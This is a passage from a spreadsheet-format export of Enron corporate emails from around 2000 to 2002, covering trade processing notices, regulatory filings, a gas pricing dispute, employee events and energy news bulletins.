On Tuesday, October 30, 2001, the Eve of the First Notice Day, all Brokers_x000D_
and Clearing Members must have a duly authorized, On-Line Trade Entry_x000D_
("OLTE") system trained representative available until such time as the_x000D_
Exchange deems necessary._x000D_
_x000D_
It is imperative that trades involving the Spot Month are processed and_x000D_
cleared properly.  Therefore, representatives are expected to make a_x000D_
diligent effort to process all Spot Month trades accurately._x000D_
_x000D_
Failure by any Clearing Member or qualified Floor Trader to show due_x000D_
diligence involving Spot Month Trade processing may result in severe_x000D_
disciplinary action by the Exchange._x000D_
_x000D_
If you should have any questions, please do not hesitate to contact David_x000D_
Sherman at (212) 299-2061.</t>
  </si>
  <si>
    <t>Thu, 7 Dec 2000 00:45:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lauri.allen@enron.com', 'danny.conner@enron.com', 'janet.wallis@enron.com', 'jim.schwieger@enron.com', 'gary.lamphier@enron.com', 'carey.metz@enron.com', 'stacey.neuweiler@enron.com', 'eric.bass@enron.com', 'james.mckay@enron.com', 'liz.bellamy@enron.com', 'greg.mcclendon@enron.com', 'daren.farmer@enron.com', 'edward.gottlob@enron.com', 'thomas.martin@enron.com', 'elsa.villarreal@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">FYI - _x000D_
---------------------- Forwarded by Laura Harder/Corp/Enron on 12/07/2000 _x000D_
08:35 AM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Amanda Huble                           12/06/2000 04:39 PM_x000D_
	_x000D_
_x000D_
To: Becky Young/NA/Enron@Enron, Laura Harder/Corp/Enron@Enron, Jessica _x000D_
Presas/Corp/Enron@ENRON, Ina Rangel/HOU/ECT@ECT, Airam Arteaga/HOU/ECT@ECT, _x000D_
Kimberly Brown/HOU/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: _x000D_
_x000D_
Please forward this message to your groups..._x000D_
_x000D_
Dr. Gary Ross (PIRA CEO)  will here tomorrow to discuss the global oil _x000D_
markets._x000D_
_x000D_
Thursday Dec 7, 2000 in room 8c1 from 3:30 to 5._x000D_
_x000D_
Thank you, _x000D_
Amanda Huble_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 25 Sep 2000 03:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>EPMI protests AEP's continuation of MBRs</t>
  </si>
  <si>
    <t xml:space="preserve">Christi, I was unable to open the file can you please send a hard copy.  _x000D_
_x000D_
Regards_x000D_
Delainey_x000D_
---------------------- Forwarded by David W Delainey/HOU/ECT on 09/25/2000 _x000D_
10:29 AM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Christi L Nicolay                           09/25/2000 09:16 AM_x000D_
	_x000D_
_x000D_
To: David W Delainey/HOU/ECT@ECT, Ben Jacoby/HOU/ECT@ECT, Ozzie _x000D_
Pagan/HOU/ECT@ECT, Janet R Dietrich/HOU/ECT@ECT, Dennis _x000D_
Benevides/HOU/EES@EES, Raymond Bowen/HOU/ECT@ECT_x000D_
cc: James D Steffes/HOU/EES@EES, Richard Shapiro/HOU/EES@EES, Joe _x000D_
Hartsoe/Corp/Enron@Enron, Steven J Kean/NA/Enron@Enron _x000D_
Subject: EPMI protests AEP's continuation of MBRs_x000D_
_x000D_
On 9/21, EPMI filed a protest (Below) against AEP/CSW's 3 year update request _x000D_
to continue market based rates for power marketing.  The filing includes _x000D_
examples of discriminatory behavior on OASIS (for ATCs, etc.) that _x000D_
potentially benefitted AEP's marketing side. _x000D_
_x000D_
EPMI has already protested Entergy's request for continuation of MBRs earlier _x000D_
this year, and plans to protest other large utility-based power marketer MBR _x000D_
filings this fall.  Let me know if you would like the list.  Thanks._x000D_
---------------------- Forwarded by Christi L Nicolay/HOU/ECT on 09/25/2000 _x000D_
08:58 AM ---------------------------_x000D_
_x000D_
_x000D_
"Susan Buchheit" &lt;sbuchheit@bracepatt.com&gt; on 09/25/2000 09:05:19 AM_x000D_
To: &lt;christi.l.nicolay@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: AEP filing_x000D_
_x000D_
_x000D_
** High Priority **_x000D_
_x000D_
Christi -_x000D_
_x000D_
Attached is the final filing in word.  I also sent you a hard copy on Friday._x000D_
_x000D_
 - aep.doc_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 11 May 2001 15:27:28 -0700 (PDT)</t>
  </si>
  <si>
    <t>Enron In Action 05.14.01</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
_x000D_
_x000D_
Step outside for some fresh air, lunch &amp; entertainment!!_x000D_
_x000D_
Visit the Big E Cafe this Friday and celebrate the 2001 Summer Splash !!   Pappas will serve burgers and trimmings to the Latin beat of The Norma Zenteno Band.  A  Customized  2001 PT Cruiser will be raffled by the Sunshine Kids.  Test your strength on the Sun &amp; Ski Sports Rock Climbing Wall._x000D_
_x000D_
In conjunction with National Employee Health &amp; Fitness Week and the Body Shop's 15th Year Anniversary, the Body Shop will sponsor various activities at the Big E Cafe Summer Splash.  These activities include:_x000D_
_x000D_
	?    Complimentary Body and Soul Chair Massages _x000D_
?	Koala Health Care Muscle Analysis _x000D_
?	Blood Pressure Assessments _x000D_
?	Information about Enron's Travel Club and activities_x000D_
_x000D_
The Big E Cafe is from 11:30am-1:00pm in Antioch Park and Lunch will cost $5 so SPLASH on by and have some fun!! _x000D_
_x000D_
Houston Astros Half-Price Ticket Offer Exclusively to Enron Employees!_x000D_
_x000D_
The Houston Astros are excited to bring Enron employees an exclusive offer to watch the Astros take on the San Diego Padres at Enron Field May 21 - 23, 2001.  Employees can purchase Upper Deck tickets for only $5 and Mezzanine tickets for only $6!  This half price offer is available at ticketmaster.com/jackpot/enron (http://www.ticketmaster.com/jackpot/enron/) beginning on Monday, May 14th at 9 AM and ending on Monday, May 21st at 3 PM._x000D_
_x000D_
To take advantage of this discount offer follow these instructions_x000D_
 1. Click on the link above (Please Note: The above hyperlink may not retrieve the web page if the address extends to more than one line. If this should occur, please copy the full text of the address and paste it into the address box in your web browser.)_x000D_
2. Scroll down to promotions &amp; special offers_x000D_
3. Enter password baseball1 in B2B password box_x000D_
4. Enter the number of tickets in B2B ticket box_x000D_
5. Select either Upper Deck or Mezzanine in pricing &amp; ticket locations drop down menu_x000D_
6. Select delivery method_x000D_
7. Scroll down and click on "Look for Tickets" key_x000D_
_x000D_
Should you have any questions, please contact Astros Ticket Services at (713) 259-8500._x000D_
_x000D_
Star Wars: Films (May 4-25)_x000D_
See all four completed films of the legendary Star Wars saga on the big screen! The MFAH presents special editions of Episodes IV-VI and Episode I in the newly renovated Brown Auditorium with Dolby Digital dts sound and stadium seating._x000D_
_x000D_
Star Wars: Episode IV-A New Hope_x000D_
Directed by George Lucas_x000D_
(USA, 1977, 125 min.)_x000D_
Friday, May 4, 7:30 p.m._x000D_
Saturday, May 5, 11:00 a.m._x000D_
_x000D_
Star Wars: Episode V-The Empire Strikes Back_x000D_
Directed by Irvin Kershner_x000D_
(USA, 1980, 120 min.)_x000D_
Friday, May 11, 7:30 p.m._x000D_
Saturday, May 12, 11:00 a.m._x000D_
_x000D_
Star Wars: Episode VI-Return of the Jedi_x000D_
Directed by Richard Marquand_x000D_
(USA, 1983, 132 min.)_x000D_
Friday, May 18, 7:30 p.m._x000D_
Saturday, May 19, 11:00 a.m._x000D_
_x000D_
Star Wars: Episode I-The Phantom Menace_x000D_
Directed by George Lucas_x000D_
(USA, 1999, 133 min.)_x000D_
Friday, May 25, 7:30 p.m._x000D_
Saturday, May 26, 11:00 a.m._x000D_
_x000D_
Tickets go on sale at the Brown Auditorium ticket booth 30 minutes before_x000D_
show time. The ticket booth is located on the lower level of the Caroline_x000D_
Wiess Law building._x000D_
_x000D_
General admission is $5. Matinee admission (show times before 5:00 p.m.) is $4. Enron employees with ID receive a $1 discount. Discount passes (10 admissions) are $40 for nonmembers and $35 for members. Children 5 and under are free. Films are screened in Brown Auditorium in the museum's Caroline Wiess Law building, 1001 Bissonnet.  Free parking is available.  For more information, please call 713-639-7515 or visit our website at www.mfah.org._x000D_
_x000D_
_x000D_
Help Cure Cystic Fibrosis_x000D_
_x000D_
The Cystic Fibrosis Foundation is hosting its annual Great Strides Walk on Saturday, May 19 at Hermann Park.  The event is the foundation's major, grassroots fundraising event, and $0.92 of every dollar raised in the walk goes directly to furthering research into more effective treatments for the disease._x000D_
_x000D_
Cystic Fibrosis is the most common fatal genetic disease in the Caucasian population today, affecting over 30,000 children and young adults in the United States.  The current median survival age for CF patients is 31 years._x000D_
_x000D_
If you would like more information on participating in the walk or sponsoring a walker, please contact Jeff Poche at X 6-9530._x000D_
_x000D_
Help people affected by arthritis. Join A Joint Walk on May 20.   _x000D_
Thousands of greater Houstonians will join the walk to cure arthritis.  The 5-mile walk begins at the Kelsey-Seybold Clinic and travels along Braes Bayou. Call 713-529-0800 and "get in step"._x000D_
_x000D_
_x000D_
Increase Your Leadership Skills with Project Blueprint!_x000D_
Project Blueprint, a program of the United Way of the Texas Gulf Coast, is a 9-week course designed to increase ethnically diverse leadership in the nonprofit sector.  Participants in the training enhance their leadership and management skills, which in turn allows them to give back to their community in a meaningful way.  For more information or an application for Class XXI, please contact Ana Eigler, Project Blueprint Coordinator, at 713-685-2711.  The application deadline is July 10, 2001._x000D_
_x000D_
_x000D_
_x000D_
What: 		Impromptu, Young Professionals Symphony Network_x000D_
		This is an opportunity for young professionals  to socialize at Sambuca Jazz cafe, one of Downtown Houston's most popular restaurants and 			network with other professionals in a casual setting followed by  a Houston Symphony concert._x000D_
_x000D_
Concert:  	Celebrate  the Houston Symphony's final performance of the season_x000D_
		with Music Director Designate Hans Graf._x000D_
	_x000D_
      		Hans Graf, conductor_x000D_
	          	Leon Fleisher, piano_x000D_
_x000D_
	          	Barber    Medea's Dance of Vengeance_x000D_
          		Mozart    Piano Concerto No. 12_x000D_
          		Strauss   A Hero's Life_x000D_
_x000D_
When:     	Monday, May 21_x000D_
_x000D_
Where:    	Pre-concert party at Sambuca Jazz Cafe, 909 Texas_x000D_
		concert at Jones Hall, 615 Louisiana_x000D_
_x000D_
Time:      	Party, 6:00 PM - 7:30 PM_x000D_
		Concert, 8PM_x000D_
_x000D_
Cost:       	$35 includes your ticket to the concert and pre-concert_x000D_
		party.  There will be complimentary hors'doeuvres, live jazz_x000D_
		by the Blue Monks, door prizes and a cash bar._x000D_
_x000D_
_x000D_
R.S.V.P.   	Please visit us on-line at www.houstonsymphony.org or call 					713.238.1428 to make your reservations today._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
The Contemporary Arts Museum needs volunteers to help with CAM*boree, a special event for kids Sunday May 20, 5:00pm to 8:00pm.  There will be a picnic dinner, music and artist-led activities.  Volunteers will help play with the kids, ages 2-12.  It is so much fun and a short time commitment.  Volunteers get a FREE Museum membership as a thank you.  Please respond by May 16 to Jennifer Milligan X35272._x000D_
_x000D_
_x000D_
Support KidSave and Help Miracles Happen. Every Summer._x000D_
 _x000D_
Kidsave's  Summer Miracles Program enables orphaned children ages 5 to 11 to travel to the  US and Canada, live with families and attend day camp. The program gives  families who may be concerned about the problems of adopting an older child a  chance to meet, get to know and in the best-case scenario, fall in love with a  child. The program gives prospective parents an opportunity to see and evaluate  first-hand the challenges and rewards of adopting an older  child._x000D_
 _x000D_
In 1999 and  2000 Kidsave and adoption agency partners placed 432 children - 96 percent of  children who participated in the program. Generally, 85 to 90 percent of  children who participate in the program find homes easily through the program.  The remaining 10 to 15 percent require more work._x000D_
 _x000D_
Kidsave  believes every child deserves a family. We are committed to placing all children  who participate in the Summer Miracles Program in permanent families or  family-like environments._x000D_
 _x000D_
We are looking  for families to host children, and for others who want to help us make the camp  program happen for these 250 children.   As a non-profit organization, Kidsave depends on donations to raise the  money to bring these children here and find them families.  Please call Tonya Hoppe at 281.286.8948  or tonya@tonya.cc to get involved in Houston's  Kidsave program.   _x000D_
_x000D_
_x000D_
Enron and Kidventure Camps are proud to bring you Camp Enron Summer 2001.  Celebrating our third year, Camp Enron  will once again be providing summer camp for children, ages 5-13, of Enron employees and contractors. _x000D_
_x000D_
This year, camp will be May 29-August 10.  Ten, one-week sessions will be  available and families may choose to attend any or all sessions.  Each camp week is Monday through Friday. _x000D_
_x000D_
The cost is $150 per week and includes all transportation, field trips and activities.  A deposit of $50 per week is all that is needed to reserve your sessions.   The deadline to register is Monday, May 21.  _x000D_
_x000D_
To register, log on to: http://www.kidventurecamp.com/camp_enron.htm.   Spaces are limited._x000D_
_x000D_
Enron parents simply ride to work with  their children and check them in to the Energizer room in the morning with the Camp Enron Team.  Enron Campers are loaded on Coach USA Buses and transported to our nearby camp. At the end of the day campers are brought back to the Energizer for parents to check out.  _x000D_
_x000D_
It's that easy!_x000D_
_x000D_
For more information please contact:_x000D_
_x000D_
web site: www.kidventurecamp.com_x000D_
call Kidventure: 713.960.8989_x000D_
e-mail: camps@kidventurecamp.com_x000D_
_x000D_
Have News to Share?_x000D_
To post news or events in Enron In Action, please e-mail your information to EIA@enron.com _x000D_
no later than 12:00 noon the Thursday prior to the next Monday's mailing._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 4 Oct 2000 08:09:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ernsthaft.w@nypa.gov'})</t>
  </si>
  <si>
    <t>NYPA ISDA Master</t>
  </si>
  <si>
    <t xml:space="preserve">Bill:  Sorry for the malfunction!_x000D_
</t>
  </si>
  <si>
    <t>Thu, 31 Jan 2002 13:08:20 -0800 (PST)</t>
  </si>
  <si>
    <t>I am back, but...</t>
  </si>
  <si>
    <t>Not always feeling better.  I am very sore today</t>
  </si>
  <si>
    <t>Tue, 10 Oct 2000 09:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'daniel.brown@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'drew.lynch@enron.com', 'neil.davies@enron.com', 'sarah.davis@enron.com', 'suzanne.brown@enron.com', 'mary.joyce@enron.com', 'bob.sparger@enron.com', 'daniel.brown@enron.com', 'tana.cashion@enron.com', 'robert.jones@enron.com', 'andrea.yowman@enron.com', "tim.o'rourke@enron.com", 'david.oxley@enron.com'})</t>
  </si>
  <si>
    <t>Agenda for Mission Possible Meeting</t>
  </si>
  <si>
    <t xml:space="preserve">Our agenda for the October 16 meeting starting at 10:00 a.m.  has been _x000D_
attached for your review along with David's draft.  As you will see, there is _x000D_
a great deal to cover in a very limited amount of time._x000D_
_x000D_
Cheers,_x000D_
Tana/Daniel_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Tue, 11 Jan 2000 01:12:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rhett.jackson@enron.com'})</t>
  </si>
  <si>
    <t>I think we have compiled all the information you requested. Sorry for the _x000D_
delay. Please call Linda Guinn at  ext.36104</t>
  </si>
  <si>
    <t>Wed, 9 Jan 2002 14:36:55 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Book request #B-JAN09-3-ST-7</t>
  </si>
  <si>
    <t xml:space="preserve">Kam - Cheryl was able to use the short-name "PERFORMANCE".  Please disregard my e-mail.  I will notify you when they're set up in ERMS._x000D_
_x000D_
ST_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Johnson, Cheryl  _x000D_
Sent:	Wednesday, January 09, 2002 4:32 PM_x000D_
To:	Trevino, Susan; Hare, Bill D.; Otegbola, Remi; Rodriguez, Bernice_x000D_
Cc:	Wilson, Shona; Abel, Chris; Ayala, Susie_x000D_
Subject:	RE: Book request #B-JAN09-3-ST-7_x000D_
_x000D_
The books have been created in GCP per your request._x000D_
_x000D_
CP ID 27914	PERFORMANCE_x000D_
CP ID 166951	IM-PERFORMANCE_x000D_
CP ID 166953	FT-PERFORMANCE_x000D_
_x000D_
Let us know if you require anything further._x000D_
_x000D_
Cheryl x33103_x000D_
 -----Original Message-----_x000D_
From: 	Trevino, Susan  _x000D_
Sent:	Wednesday, January 09, 2002 3:56 PM_x000D_
To:	Hare, Bill D.; Johnson, Cheryl; Otegbola, Remi; Rodriguez, Bernice_x000D_
Cc:	Wilson, Shona; Abel, Chris; Ayala, Susie_x000D_
Subject:	Book request #B-JAN09-3-ST-7_x000D_
_x000D_
Please set up the books on the attached book request form and notify me when complete.  Contact me if you have any questions._x000D_
_x000D_
Thanks,_x000D_
Susan_x000D_
x3-1462_x000D_
_x000D_
_x000D_
 &lt;&lt; File: B-JAN09-3-ST-7.xls &gt;&gt; </t>
  </si>
  <si>
    <t>Mon, 11 Dec 2000 06:29:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Passwords</t>
  </si>
  <si>
    <t>A lot of us are going to be out ... please give me all of the passwords that _x000D_
may be needed if/when you are out._x000D_
_x000D_
Thanks,_x000D_
Laura</t>
  </si>
  <si>
    <t>Mon, 2 Aug 1999 03:22:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'patricia.cini@enron.com'})</t>
  </si>
  <si>
    <t>Re: Duke Energy International ISDA</t>
  </si>
  <si>
    <t xml:space="preserve">FYI - We have not received anything.  Have you?  ss_x000D_
_x000D_
_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  Patricia Cini                           07/28/99 06:07 PM_x000D_
	_x000D_
_x000D_
To: Brent Hendry/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc: Sara Shackleton/HOU/ECT@ECT, Marie Heard/HOU/ECT@ECT _x000D_
Subject: Duke Energy International ISDA_x000D_
_x000D_
Duke did not send comments back to us like Julie Dill had advised a couple of _x000D_
weeks ago.  However, they will be sending these to us tomorrow._x000D_
_x000D_
Regards,_x000D_
_x000D_
Pat_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 15 Nov 2000 07:24:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'charlene.richmond@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">I changed the price to 2.85.  With the changes in personnel on the desk, we _x000D_
don't have a lot of info to dispute their price.  It's not cost beneficial to _x000D_
do so anyway._x000D_
_x000D_
D_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Charlene Richmond_x000D_
11/15/2000 12:59 PM_x000D_
To: Daren J Farmer/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Another HESCO Issue  _x000D_
_x000D_
Hesco is showing a price of $2.85 for tne 29 &amp; 30_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Daren J Farmer_x000D_
11/15/2000 10:33 AM_x000D_
To: Charlene Richmond/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Another HESCO Issue  _x000D_
_x000D_
Charlene, _x000D_
_x000D_
We should not have scheduled any volume for the 29-30th.  No price was _x000D_
negotiated that I can find. However, since gas did flow, I rolled the last _x000D_
price on the deal to cover those days.  What price is Hesco showing?_x000D_
_x000D_
D_x000D_
_x000D_
_x000D_
_x000D_
Charlene Richmond_x000D_
11/09/2000 01:37 PM_x000D_
To: Daren J Farmer/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Another HESCO Issue  _x000D_
_x000D_
Daren would you look at the price for 29 and 30th of March 2000 .  There are _x000D_
no prices for these days but volume was scheduled for these days._x000D_
Thanks_x000D_
Charlene_x000D_
_x000D_
_x000D_
_x000D_
Daren J Farmer_x000D_
11/02/2000 02:59 PM_x000D_
To: Charlene Richmond/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Another HESCO Issue  _x000D_
_x000D_
Charlene, _x000D_
_x000D_
Deal #214948 already had volume and price for the 12th and 13th.  You may _x000D_
need to have the volumes updated by Volume Management._x000D_
_x000D_
I added the 15th and 16th to the deal ticket. _x000D_
_x000D_
D_x000D_
_x000D_
_x000D_
_x000D_
Charlene Richmond_x000D_
11/01/2000 04:02 PM_x000D_
To: Daren J Farmer/HOU/ECT@ECT, Jennifer Martinez/HOU/ECT@ECT_x000D_
cc: Kristen J Hanson/HOU/ECT@ECT, Nick Moshou/Corp/Enron@ENRON, Cynthia _x000D_
Hakemack/HOU/ECT@ECT _x000D_
Subject: Re: Another HESCO Issue_x000D_
_x000D_
Help .   Steve Mauch at Hesco is wanting an answer ASAP_x000D_
---------------------- Forwarded by Charlene Richmond/HOU/ECT on 11/01/2000 _x000D_
03:29 PM ---------------------------_x000D_
_x000D_
_x000D_
Vance L Taylor_x000D_
11/01/2000 02:45 PM_x000D_
To: Charlene Richmond/HOU/ECT@ECT_x000D_
cc: Julie Meyers/HOU/ECT@ECT _x000D_
Subject: Re: Another HESCO Issue  _x000D_
_x000D_
Charlene,_x000D_
_x000D_
This gas purchase is not a part of the wellhead portfolio but is being traded _x000D_
on the Texas desk.  I would suggest you get with Darren Farmer or someone on _x000D_
the desk._x000D_
_x000D_
Sorry I could not be of more assistance!_x000D_
_x000D_
vlt_x000D_
x3-6353_x000D_
_x000D_
_x000D_
_x000D_
Charlene Richmond_x000D_
11/01/2000 08:22 AM_x000D_
To: Julie Meyers/HOU/ECT@ECT, Vance L Taylor/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Another HESCO Issue_x000D_
_x000D_
Meter 986725 for March 2000.   Per Hesco both traders are gone at (Hesco and _x000D_
Enron)  and they (Hesco) were not paid  the correct price  in March on the _x000D_
days mentioned below. Hesco cannot find where the price for these days were _x000D_
recorded.  Per Hesco they  were underpaid by $32,101.57.  Hesco is wanting to _x000D_
come to our office to have a meeting about clearing this up.  It will be nice _x000D_
if we don't have to meet with them._x000D_
_x000D_
Production dates are             Volume                     price they are _x000D_
looking for _x000D_
03/12                                               _x000D_
2,029                            2.65_x000D_
03/13                                               _x000D_
2,009                            2.65_x000D_
03/15                                               _x000D_
2,022                            2.71_x000D_
03/16                                               _x000D_
1,976                            2.72_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 24 Apr 2001 03:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Financial trade agreements database</t>
  </si>
  <si>
    <t>Tana,_x000D_
_x000D_
Could you please email Angela Chen the link for the Financial Trade _x000D_
Agreements Notes database?  Thanks very much!</t>
  </si>
  <si>
    <t>Thu, 15 Mar 2001 03:11:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'laura.podurgiel@enron.com', 'ozzie.pagan@enron.com', 'rogers.herndon@enron.com', 'reagan.rorschach@enron.com', 'tom.chapman@enron.com', 'george.mccormick@enron.com', 'heather.kroll@enron.com', 'richard.shapiro@enron.com', 'thane.twiggs@enron.com', 'berney.aucoin@enron.com', 'steven.kean@enron.com', 'david.fairley@enron.com', 'ron.mcnamara@enron.com', 'jennifer.bagwell@enron.com', 'mike.roan@enron.com', 'edith.cross@enron.com', 'bill.rust@enron.com', 'billy.braddock@enron.com', 'john.forney@enron.com', 'mike.carson@enron.com', 'joseph.wagner@enron.com', 'james.steffes@enron.com', 'wjennin@enron.com', 'elizabeth.johnston@enron.com', 'joe.connor@enron.com'})</t>
  </si>
  <si>
    <t>FERC's Press Release re: Southern RTO</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
The Federal Energy Regulatory Commission rejected two key elements of_x000D_
Southern Company Services, Inc.'s proposed Regional Transmission Organzation _x000D_
(RTO)_x000D_
and encouraged the company to explore joining neighboring utilities in an RTO _x000D_
for the_x000D_
Southeast. The Commission did not act on other issues raised by Southern._x000D_
_x000D_
Southern's proposal for a for-profit gridco (grid company) that would include _x000D_
only_x000D_
new wholesale transmission services and have the benefits of certain rate _x000D_
incentives_x000D_
going to others rather than the RTO operator are inconsistent with FERC's RTO _x000D_
policy,_x000D_
the Commission said. Under Southern's proposal, existing owners' transmission _x000D_
facilities_x000D_
related to bundled retail service or native load would not be under the _x000D_
gridco's control._x000D_
As a result, the vast majority of total transmission load would not be under _x000D_
the RTO's_x000D_
tariff, operation or direction._x000D_
_x000D_
The RTO rule requires all transmission facilities operate under the transco. _x000D_
In_x000D_
addition, Southern could not plan, design and operate a regional grid in a _x000D_
manner that_x000D_
maximizes efficiency if the transco controlled only a small part of the RTO _x000D_
load, the_x000D_
Commission said in rejecting Southern's proposal._x000D_
_x000D_
As an alternative to filing a revised RTO proposal, the Commission asked that_x000D_
Southern consider joining neighboring utilities in an RTO in the Southeast. _x000D_
The_x000D_
Commission directed Southern to file a report by July 13, 2001, on progress _x000D_
in forming a_x000D_
Southeastern RTO._x000D_
</t>
  </si>
  <si>
    <t>Mon, 18 Sep 2000 10:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: DDO QUESTION SUBMISSION</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Dana Davis/HOU/ECT on 09/18/2000 05:00 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
"IMAP" &lt;jcampbell@ddo2.defensivedriver.com&gt; on 09/18/2000 03:05:36 PM_x000D_
To: &lt;dana.davis@enron.com&gt;_x000D_
cc:  _x000D_
Subject: Re: DDO QUESTION SUBMISSION_x000D_
_x000D_
_x000D_
Dana,_x000D_
If you complete the course by 3:00pm on any weekday, we will print mail out_x000D_
your Certificate of Completion the same day.  All Certificates are mailed_x000D_
out via US Mail unless the student selects to have their Certificate sent to_x000D_
them via our express delivery option.  We use Federal Express and charge an_x000D_
additional $20.00 for this service.  We ask all students to allow 7-10_x000D_
business days if their Certificate is mailed via US Mail or if you select to_x000D_
have it sent FedEx your Certificate will be delivered the following day by_x000D_
3:00pm._x000D_
_x000D_
If you have any other questions, please contact me at 888-547-9272._x000D_
_x000D_
Sincerely,_x000D_
Jyll Campbell_x000D_
Office Administrator_x000D_
----- Original Message -----_x000D_
From: &lt;dana.davis@enron.com&gt;_x000D_
To: &lt;support@defensivedriver.com&gt;_x000D_
Sent: Monday, September 18, 2000 2:36 PM_x000D_
Subject: DDO QUESTION SUBMISSION_x000D_
_x000D_
_x000D_
&gt;_x000D_
&gt; Mozilla/4.74 [en] (WinNT; U)_x000D_
&gt; NAME: Dana Davis_x000D_
&gt; DL NUMBER: 15044825_x000D_
&gt; How long will it take to get the certificate of completion back?_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 20 Dec 2001 13:29:00 -0800 (PST)</t>
  </si>
  <si>
    <t>SCS CRUDE STRADDLE UPDATE 1:25</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
  _x000D_
 - 12_20_01LO.xls </t>
  </si>
  <si>
    <t>Tue, 8 Jan 2002 15:17:05 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
 =09 =09    Dear Vincent,  The Washington bureau will bring us more Wednesd=_x000D_
ay from their one-on-one interview with FERC Chairman Pat Wood.  We'll hear=_x000D_
 what Chairman Wood has to say on a wide range of topics including market p=_x000D_
ower, standard market design and the push for regional transmission organiz=_x000D_
ations.  Wood will also talk about the implications of the Enron collapse a=_x000D_
nd why he feels Texas will play an important role in showing the country th=_x000D_
at retail electricity competition can work.     Washington Bureau Chief Pet=_x000D_
er Cook says they'll bring us details Wednesday of an announcement from Sec=_x000D_
retary of Energy Spencer Abraham on a new government partnership with the a=_x000D_
uto industry, aimed at developing cars powered by hydrogen. Abraham is expe=_x000D_
cted to unveil the plan at the Detroit auto show tomorrow.   Washington wil=_x000D_
l also take a closer look at the impact the crisis in Argentina is having o=_x000D_
n U.S. energy companies.  U.S. Energy Association's Barry Worthington will =_x000D_
talk about Argentina during the 11:00 a.m. ET newscast.   On Wednesday from=_x000D_
 the Houston bureau, Industrial Information Resources Synfuels and Petroleu=_x000D_
m Refining Group Manager Chris Paschall will stop by.  He'll discuss the U.=_x000D_
S. petroleum refining industry during the noon ET newscast tomorrow.    Als=_x000D_
o from Houston, Simmons Company &amp; International Analyst Justin Tugman talks=_x000D_
 about the problems Halliburton is having, and how those problems shouldn't=_x000D_
 affect other companies in the oil field service sector.  Join us from the =_x000D_
Houston bureau on Wednesday.   California Governor Gray Davis gives his Sta=_x000D_
te of the State address Tuesday evening.  West Coast Correspondent Kym McNi=_x000D_
cholas says he is expected to talk about California's energy conservation e=_x000D_
fforts and what's to come in 2002.  We'll bring you details from Governor D=_x000D_
avis' speech on Wednesday from the West Coast bureau.   Kym also says she'l=_x000D_
l be speaking with Western Power Trading Forum Executive Director Gary Acke=_x000D_
rman on Wednesday.  Ackerman will bring us his reaction to Governor Davis' =_x000D_
State of the State address.    Closing Prices for Tuesday, Jan. 8, 2002    =_x000D_
Crude: $21.25/bbl -$0.23   Unleaded: $0.6099/gallon -$0.0135   Heating Oil:=_x000D_
 $0.5682/gallon -$0.0037   Gas: $2.811/mmBtu +$0.009   Fwd uE(Feb): $3.76/m=_x000D_
mBtu $0.00   Video Library: Washington Bureau Chief Peter Cook's one-on-one=_x000D_
 interview with FERC Chairman Pat Wood is archived in its entirety in ENL's=_x000D_
 Video Library.   Keep in mind things are subject to change at a moment's n=_x000D_
otice. Occasionally guests have to reschedule or change time slots.  We'll =_x000D_
continue to do our best to keep you updated on future interviews and events=_x000D_
.     Be sure to watch our newscasts every business day - 9 a.m. to 5 p.m. =_x000D_
ET, at the top of each hour.  =09 =09=09=09=09_x000D_
 =09=09=09=09=09=09 =09_x000D_
=09 =09Jay Rickerts, EnergyNewsLive.com Anchor  View today's Energy Wrap Vi=_x000D_
deo Windows Media Player: 56K  | 100K  | 300K  Real Player: 56K  | 100K  | =_x000D_
300K  (Requires Windows Media Player or Real Player )   Experience all that=_x000D_
 Williams Energy News Live has to offer!   If you are receiving this letter=_x000D_
